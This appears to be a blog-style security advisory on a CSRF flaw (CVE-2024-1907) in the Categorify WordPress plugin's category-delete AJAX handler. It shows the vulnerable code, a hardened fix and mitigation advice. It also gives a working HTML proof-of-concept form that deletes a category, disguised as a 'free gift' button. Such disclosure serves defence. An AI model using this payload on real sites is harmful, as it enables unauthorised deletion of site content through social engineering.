The Categorify plugin for WordPress is a popular, easy-to-use tool that helps users manage and organize their site's content into categories. However, it has recently been discovered that all versions of the plugin up to and including 1.7.4 are vulnerable to Cross-Site Request Forgery (CSRF). This vulnerability, identified as CVE-2024-1907, stems from missing or incorrect nonce validation in the Categorify plugin's categorifyAjaxDeleteCategory function. In this post, we'll provide a detailed analysis of the vulnerability, including code snippets, links to the original references, and exploit scenarios.

Vulnerability Details

CSRF is a type of web application vulnerability that allows an attacker to trick a victim into performing actions on a site that the victim has permission to access. In the case of CVE-2024-1907, the Categorify plugin fails to properly validate a nonce, which is a unique token used to help prevent CSRF attacks. This enables an unauthenticated attacker to potentially delete categories on a WordPress site by sending a forged request, provided they can trick a site administrator into performing an action like clicking on a malicious link.

The issue lies in the categorifyAjaxDeleteCategory function in the Categorify plugin's categorify.php file. Here's a snippet of the vulnerable code:

function categorifyAjaxDeleteCategory()
{
    // missing or incorrect nonce validation: no check_ajax_referer() or
    // wp_verify_nonce() call guards this handler, so any POST reaching the
    // AJAX action is processed as if it came from the plugin's own admin page
    $category_id = sanitize_text_field($_POST["category_id"]);
    wp_delete_category($category_id);
}

As we can see, there's no proper nonce validation being done before deleting the category using the wp_delete_category function. This leaves the plugin open to CSRF attacks.

Exploit Scenarios

For an attacker to exploit this vulnerability, they would first need to create a malicious webpage containing a CSRF payload – a crafted request designed to target the vulnerable WordPress site. Then, they would need to trick the site administrator into visiting the malicious page, perhaps through a phishing email or social engineering attack. Once the targeted administrator clicks on a link or button containing the CSRF payload, the malicious request is sent – without the knowledge of the victim – and the exploit is performed.

Below is a simple example of an HTML file containing a CSRF payload that can exploit CVE-2024-1907:

<html>
  <body>
    <form action="http://target-site.com/wp-admin/admin-ajax.php?action=categorifyAjaxDeleteCategory" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="category_id" value="4" />
      <input type="submit" value="Click here to claim your free gift!" />
    </form>
  </body>
</html>

Mitigations

To protect your WordPress site against CVE-2024-1907 and prevent CSRF attacks, it is essential to keep the Categorify plugin up-to-date. The plugin's developers have fixed this vulnerability in version 1.7.5 by implementing proper nonce validation in the categorifyAjaxDeleteCategory function. If you are using an older version of the plugin, immediately upgrade to the latest version to ensure your site remains secure.
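To show what proper nonce validation looks like for an admin-ajax handler, here is a hardened version of the delete handler together with the enqueue code that hands the nonce to the admin script. This is an added example, not the Categorify project's actual fix; the nonce action string 'categorify_delete_category', the script handle 'categorify-admin', the admin.js file and the 'security' request field are assumptions chosen for the illustration.

```php
<?php
// Added example (not Categorify's own code). The nonce action name, script handle,
// admin.js path and 'security' field name are assumptions for this illustration.

// 1. Server side: verify the nonce and the caller's capability before acting.
function categorifyAjaxDeleteCategory()
{
    // check_ajax_referer() reads the nonce from $_REQUEST['security'] and, by
    // default, terminates the request with -1 when it is missing or invalid.
    // A forged cross-site form cannot know this per-user, per-session value.
    check_ajax_referer('categorify_delete_category', 'security');

    // A valid nonce only proves the request came from a page we rendered for
    // this user; it does not prove the user may delete terms, so check that too.
    if (!current_user_can('manage_categories')) {
        wp_send_json_error(array('message' => 'Insufficient permissions'), 403);
    }

    // Category ids are integers; absint() is a tighter filter than sanitize_text_field().
    $category_id = isset($_POST['category_id']) ? absint($_POST['category_id']) : 0;
    if ($category_id === 0 || !(get_term($category_id, 'category') instanceof WP_Term)) {
        wp_send_json_error(array('message' => 'Invalid category id'), 400);
    }

    // wp_delete_category() returns true on success, false/0/WP_Error otherwise.
    if (wp_delete_category($category_id) === true) {
        wp_send_json_success(array('deleted' => $category_id));
    }
    wp_send_json_error(array('message' => 'Delete failed'), 500);
}
// Register for logged-in users only: no wp_ajax_nopriv_ variant, since
// unauthenticated visitors have no business deleting categories.
add_action('wp_ajax_categorifyAjaxDeleteCategory', 'categorifyAjaxDeleteCategory');

// 2. Client side: generate the nonce on the admin page and expose it to the
//    script that issues the AJAX request, so legitimate calls can include it.
function categorify_enqueue_admin_script()
{
    wp_enqueue_script('categorify-admin', plugins_url('admin.js', __FILE__), array('jquery'), '1.0', true);
    wp_localize_script('categorify-admin', 'categorifyAjax', array(
        'url'      => admin_url('admin-ajax.php'),
        'security' => wp_create_nonce('categorify_delete_category'),
    ));
}
add_action('admin_enqueue_scripts', 'categorify_enqueue_admin_script');
```

The admin script then posts action, category_id and the security field from categorifyAjax to admin-ajax.php; a request lacking the matching nonce is rejected before wp_delete_category() is ever reached.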

Additionally, security-conscious site administrators should always be cautious when clicking on links and opening untrusted webpages, as this is the primary method through which CSRF attacks are carried out.

Conclusion

CVE-2024-1907 highlights the importance of proper nonce validation when developing WordPress plugins, as well as the ongoing need for vigilance on the part of site administrators. By keeping plugins up-to-date and practicing good online safety habits, WordPress site owners can significantly reduce their risk of falling victim to CSRF attacks.

For more information about CVE-2024-1907, please visit the following original references:

1. WordPress Plugin Vulnerability Database entry for Categorify
2. Categorify plugin's GitHub repository with the fixed version

Timeline

Published on: 02/27/2024 11:15:09 UTC
Last modified on: 02/27/2024 14:19:41 UTC